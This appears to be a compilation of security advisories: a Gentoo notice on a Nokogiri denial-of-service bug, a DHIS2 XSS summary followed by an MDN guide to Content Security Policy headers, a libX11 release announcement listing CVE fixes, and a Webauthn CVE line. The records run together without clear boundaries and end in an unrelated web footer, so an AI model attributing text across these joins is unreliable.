A vulnerability has been discovered in Nokogiri, which can lead to a  
denial of service.

Background  
==========

Nokogiri is an HTML, XML, SAX, and Reader parser.

Affected packages  
=================

Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
dev-ruby/nokogiri  < 1.13.10     >= 1.13.10

Description  
===========

A denial of service vulnerability has been discovered in Nokogiri.  
Please review the CVE identifier referenced below for details.

Impact  
======

Nokogiri fails to check the return value from `xmlTextReaderExpand` in  
the method `Nokogiri::XML::Reader#attribute_hash`. This can lead to a  
null pointer exception when invalid markup is being parsed. For  
applications using `XML::Reader` to parse untrusted inputs, this may  
potentially be a vector for a denial of service attack.

Workaround  
==========

Users may be able to search their code for calls to either  
`XML::Reader#attributes` or `XML::Reader#attribute_hash` to determine if  
they are affected.

Resolution  
==========

All Nokogiri users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-ruby/nokogiri-1.13.10"

References  
==========

[ 1 ] CVE-2022-23476  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23476

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202408-13

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202408-13

DHIS 2 is an open source information system for data capture, management, validation, analytics and visualization. Through various features of DHIS2, an authenticated user may be able to upload a file which includes embedded javascript. The user could then potentially trick another authenticated user to open the malicious file in a browser which would trigger the javascript code, resulting in a cross-site scripting (XSS) attack. DHIS2 administrators should upgrade to the following hotfix releases: 2.36.12.1, 2.37.8.1, 2.38.2.1, 2.39.0.1. Users unable to upgrade may add the following simple CSP rule in your web proxy to the vulnerable endpoints: `script-src 'none'`. This workaround will prevent all javascript from running on those endpoints.

**Content Security Policy** (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross-Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft, to site defacement, to malware distribution.

CSP is designed to be fully backward compatible (except CSP version 2 where there are some explicitly-mentioned inconsistencies in backward compatibility; more details here section 1.1). Browsers that don't support it still work with servers that implement it, and vice versa: browsers that don't support CSP ignore it, functioning as usual, defaulting to the standard same-origin policy for web content. If the site doesn't offer the CSP header, browsers likewise use the standard same-origin policy.

To enable CSP, you need to configure your web server to return the Content-Security-Policy HTTP header. (Sometimes you may see mentions of the X-Content-Security-Policy header, but that's an older version and you don't need to specify it anymore.)

Alternatively, the <meta> element can be used to configure a policy, for example:

    <meta
      http-equiv="Content-Security-Policy"
      content="default-src 'self'; img-src https://*; child-src 'none';" />
    

**Threats**

**Mitigating cross-site scripting**

A primary goal of CSP is to mitigate and report XSS attacks. XSS attacks exploit the browser's trust in the content received from the server. Malicious scripts are executed by the victim's browser because the browser trusts the source of the content, even when it's not coming from where it seems to be coming from.

CSP makes it possible for server administrators to reduce or eliminate the vectors by which XSS can occur by specifying the domains that the browser should consider to be valid sources of executable scripts. A CSP compatible browser will then only execute scripts loaded in source files received from those allowed domains, ignoring all other scripts (including inline scripts and event-handling HTML attributes).

As an ultimate form of protection, sites that want to never allow scripts to be executed can opt to globally disallow script execution.

**Mitigating packet sniffing attacks**

In addition to restricting the domains from which content can be loaded, the server can specify which protocols are allowed to be used; for example (and ideally, from a security standpoint), a server can specify that all content must be loaded using HTTPS. A complete data transmission security strategy includes not only enforcing HTTPS for data transfer, but also marking all cookies with the secure attribute and providing automatic redirects from HTTP pages to their HTTPS counterparts. Sites may also use the Strict-Transport-Security HTTP header to ensure that browsers connect to them only over an encrypted channel.

**Using CSP**

Configuring Content Security Policy involves adding the Content-Security-Policy HTTP header to a web page and giving it values to control what resources the user agent is allowed to load for that page. For example, a page that uploads and displays images could allow images from anywhere, but restrict a form action to a specific endpoint. A properly designed Content Security Policy helps protect a page against a cross-site scripting attack. This article explains how to construct such headers properly, and provides examples.

**Specifying your policy**

You can use the Content-Security-Policy HTTP header to specify your policy, like this:

    Content-Security-Policy: policy
    

The policy is a string containing the policy directives describing your Content Security Policy.

**Writing a policy**

A policy is described using a series of policy directives, each of which describes the policy for a certain resource type or policy area. Your policy should include a default-src policy directive, which is a fallback for other resource types when they don't have policies of their own (for a complete list, see the description of the default-src directive). A policy needs to include a default-src or script-src directive to prevent inline scripts from running, as well as blocking the use of eval(). A policy needs to include a default-src or style-src directive to restrict inline styles from being applied from a <style> element or a style attribute. There are specific directives for a wide variety of types of items, so that each type can have its own policy, including fonts, frames, images, audio and video media, scripts, and workers.

For a complete list of policy directives, see the reference page for the Content-Security-Policy header.

**Examples: Common use cases**

This section provides examples of some common security policy scenarios.

**Example 1**

A web site administrator wants all content to come from the site's own origin (this excludes subdomains.)

    Content-Security-Policy: default-src 'self'
    

**Example 2**

A web site administrator wants to allow content from a trusted domain and all its subdomains (it doesn't have to be the same domain that the CSP is set on.)

    Content-Security-Policy: default-src 'self' example.com *.example.com
    

**Example 3**

A web site administrator wants to allow users of a web application to include images from any origin in their own content, but to restrict audio or video media to trusted providers, and all scripts only to a specific server that hosts trusted code.

    Content-Security-Policy: default-src 'self'; img-src *; media-src example.org example.net; script-src userscripts.example.com
    

Here, by default, content is only permitted from the document's origin, with the following exceptions:

*   Images may load from anywhere (note the "\*" wildcard).
*   Media is only allowed from example.org and example.net (and not from subdomains of those sites).
*   Executable script is only allowed from userscripts.example.com.

**Example 4**

A web site administrator for an online banking site wants to ensure that all its content is loaded using TLS, in order to prevent attackers from eavesdropping on requests.

    Content-Security-Policy: default-src https://onlinebanking.example.com
    

The server permits access only to documents being loaded specifically over HTTPS through the single origin onlinebanking.example.com.

**Example 5**

A web site administrator of a web mail site wants to allow HTML in email, as well as images loaded from anywhere, but not JavaScript or other potentially dangerous content.

    Content-Security-Policy: default-src 'self' *.example.com; img-src *
    

Note that this example doesn't specify a script-src; with the example CSP, this site uses the setting specified by the default-src directive, which means that scripts can be loaded only from the originating server.

**Testing your policy**

To ease deployment, CSP can be deployed in report-only mode. The policy is not enforced, but any violations are reported to a provided URI. Additionally, a report-only header can be used to test a future revision to a policy without actually deploying it.

You can use the Content-Security-Policy-Report-Only HTTP header to specify your policy, like this:

    Content-Security-Policy-Report-Only: policy
    

If both a Content-Security-Policy-Report-Only header and a Content-Security-Policy header are present in the same response, both policies are honored. The policy specified in Content-Security-Policy headers is enforced while the Content-Security-Policy-Report-Only policy generates reports but is not enforced.

**Enabling reporting**

By default, violation reports aren't sent. To enable violation reporting, you need to specify the report-uri policy directive, providing at least one URI to which to deliver the reports:

    Content-Security-Policy: default-src 'self'; report-uri http://reportcollector.example.com/collector.cgi
    

Then you need to set up your server to receive the reports; it can store or process them in whatever manner you determine is appropriate.

**Violation report syntax**

The report JSON object contains the following data:

blocked-uri

The URI of the resource that was blocked from loading by the Content Security Policy. If the blocked URI is from a different origin than the document-uri, then the blocked URI is truncated to contain just the scheme, host, and port.

disposition

Either "enforce" or "report" depending on whether the Content-Security-Policy-Report-Only header or the Content-Security-Policy header is used.

document-uri

The URI of the document in which the violation occurred.

effective-directive

The directive whose enforcement caused the violation. Some browsers may provide different values, such as Chrome providing style-src-elem/style-src-attr, even when the actually enforced directive was style-src.

original-policy

The original policy as specified by the Content-Security-Policy HTTP header.

referrer Deprecated Non-standard

The referrer of the document in which the violation occurred.

script-sample

The first 40 characters of the inline script, event handler, or style that caused the violation. Only applicable to script-src* and style-src* violations, when they contain the 'report-sample'

status-code

The HTTP status code of the resource on which the global object was instantiated.

violated-directive

The name of the policy section that was violated.

**Sample violation report**

Let's consider a page located at http://example.com/signup.html. It uses the following policy, disallowing everything but stylesheets from cdn.example.com.

    Content-Security-Policy: default-src 'none'; style-src cdn.example.com; report-uri /_/csp-reports
    

The HTML of signup.html looks like this:

    <!DOCTYPE html>
    <html lang="en-US">
      <head>
        <meta charset="UTF-8" />
        <title>Sign Up</title>
        <link rel="stylesheet" href="css/style.css" />
      </head>
      <body>
        Here be content.
      </body>
    </html>
    

Can you spot the mistake? Stylesheets are allowed to be loaded only from cdn.example.com, yet the website tries to load one from its own origin (http://example.com). A browser capable of enforcing CSP would send the following violation report as a POST request to http://example.com/_/csp-reports, when the document is visited:

    {
      "csp-report": {
        "document-uri": "http://example.com/signup.html",
        "referrer": "",
        "blocked-uri": "http://example.com/css/style.css",
        "violated-directive": "style-src cdn.example.com",
        "original-policy": "default-src 'none'; style-src cdn.example.com; report-uri /_/csp-reports"
      }
    }
    

As you can see, the report includes the full path to the violating resource in blocked-uri. This is not always the case. For example, if the signup.html attempted to load CSS from http://anothercdn.example.com/stylesheet.css, the browser would _not_ include the full path, but only the origin (http://anothercdn.example.com). The CSP specification gives an explanation of this odd behavior. In summary, this is done to prevent leaking sensitive information about cross-origin resources.

**Browser compatibility**

BCD tables only load in the browser

**Compatibility notes**

A specific incompatibility exists in some versions of the Safari web browser, whereby if a Content Security Policy header is set, but not a Same Origin header, the browser will block self-hosted content and off-site content, and incorrectly report that this is due to the Content Security Policy not allowing the content.

**See also**

CVE-2022-41947: Content Security Policy (CSP) - HTTP | MDN

An issue was discovered in libX11 through 1.6.5. The function XListExtensions in ListExt.c is vulnerable to an off-by-one error caused by malicious server responses, leading to DoS or possibly unspecified other impact.

**Matthieu Herrb** matthieu at herrb.eu  
_Tue Aug 21 15:43:23 UTC 2018_

*   Previous message (by thread): X.Org security advisory: August 21, 2018
*   Next message (by thread): X.Org security advisory: August 22, 2018
*   **Messages sorted by:** \[ date \] \[ thread \] \[ subject \] \[ author \]

Alan Coopersmith (6):
      Make Xkb{Get,Set}NamedIndicator spec & manpages match code
      Clarify state parameter to XkbSetNamedDeviceIndicator
      Improve table formatting in XkbChangeControls & XkbKeyNumGroups man pages
      If XGetImage fails to create image, don't dereference it to bounds check
      Use size\_t for buffer sizes in SetHints.c
      Change fall through comment in lcDB.c to match gcc's requirements

Arthur Huillet (1):
      \_XDefaultError: set XlibDisplayIOError flag before calling exit

Bhavi Dhingra (1):
      Fix possible memory leak in cmsProp.c:140

Martin Natano (1):
      Don't rebuild ks\_tables.h if nothing changed.

Matthieu Herrb (2):
      Remove statement with no effect.
      libX11 1.6.6

Michal Srb (1):
      Use flexible array member instead of fake size.

Ryan C. Gordon (1):
      Valgrind fix for XStoreColor and XStoreColors.

Samuel Thibault (1):
      XkbOpenDisplay.3: fix typo

Tobias Stoeckmann (4):
      Validation of server response in XListHosts.
      Fixed off-by-one writes (CVE-2018-14599).
      Fixed out of boundary write (CVE-2018-14600).
      Fixed crash on invalid reply (CVE-2018-14598).

walter harms (13):
      fix shadow warning
      \_XIOError(dpy); will never return so remore dead
      remove argument check for free() adjust one inden
      fix shadow char\_size
      fix more shadow warning
      no need to check argument for \_XkbFree()
      remove stray extern
      no need to check args for Xfree()
      fix memleak in error path
      fix memleak in error path
      no need to check XFree arguments
      mark \_XDefaultIOError as no\_return
      Fixes: warning: variable 'req' set but not,used

wharms (3):
      add \_X\_UNUSED to avoid unused variable warnings
      remove empty line
      silence gcc warning assignment discards 'const' qualifier from pointer target type

git tag: libX11-1.6.6

https://xorg.freedesktop.org/archive/individual/lib/libX11-1.6.6.tar.bz2
MD5:  6b0f83e851b3b469dd660f3a95ac3e42  libX11-1.6.6.tar.bz2
SHA1: b29cf4362b58188cb27fed2294788004af7428a9  libX11-1.6.6.tar.bz2
SHA256: 65fe181d40ec77f45417710c6a67431814ab252d21c2e85c75dd1ed568af414f  libX11-1.6.6.tar.bz2
SHA512: 9866dc6b158b15a96efe140b6fa68a775889a37e5565a126216211fee63868e02629a9f9f41816d590ef150560f43b8864010a77a6318c9109e76aec1d21b4d7  libX11-1.6.6.tar.bz2
PGP:  https://xorg.freedesktop.org/archive/individual/lib/libX11-1.6.6.tar.bz2.sig

https://xorg.freedesktop.org/archive/individual/lib/libX11-1.6.6.tar.gz
MD5:  3fd4c6b9f2333dbc5d16824baa1cfb67  libX11-1.6.6.tar.gz
SHA1: 3542c1641be5670dd1e9a38ea5b22d4278c17d19  libX11-1.6.6.tar.gz
SHA256: c7fb5b1069d700737e02766aaf800d87e87d443af76657fff7a969edfcf49da0  libX11-1.6.6.tar.gz
SHA512: 5d8a83521f53f529f6e7e2edc8d6ab837b39cbe794cc83d2dd84871656e5fb6e2d363c89df7af945547415c7bc8c7f2e85097b7b405b7e4f679071d84a42fc8d  libX11-1.6.6.tar.gz
PGP:  https://xorg.freedesktop.org/archive/individual/lib/libX11-1.6.6.tar.gz.sig

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 801 bytes
Desc: not available
URL: <https://lists.x.org/archives/xorg-announce/attachments/20180821/792b4cda/attachment.sig\>

*   Previous message (by thread): X.Org security advisory: August 21, 2018
*   Next message (by thread): X.Org security advisory: August 22, 2018
*   **Messages sorted by:** \[ date \] \[ thread \] \[ subject \] \[ author \]

More information about the xorg-announce mailing list

CVE-2018-14599: [ANNOUNCE] libX11 1.6.6

Webauthn Framework 3.3.x before 3.3.4 has Incorrect Access Control. An attacker that controls a user's system is able to login to a vulnerable service using an attached FIDO2 authenticator without passing a check of the user presence.

Search

lenovo warranty check/lookup | check warranty status | lenovo support us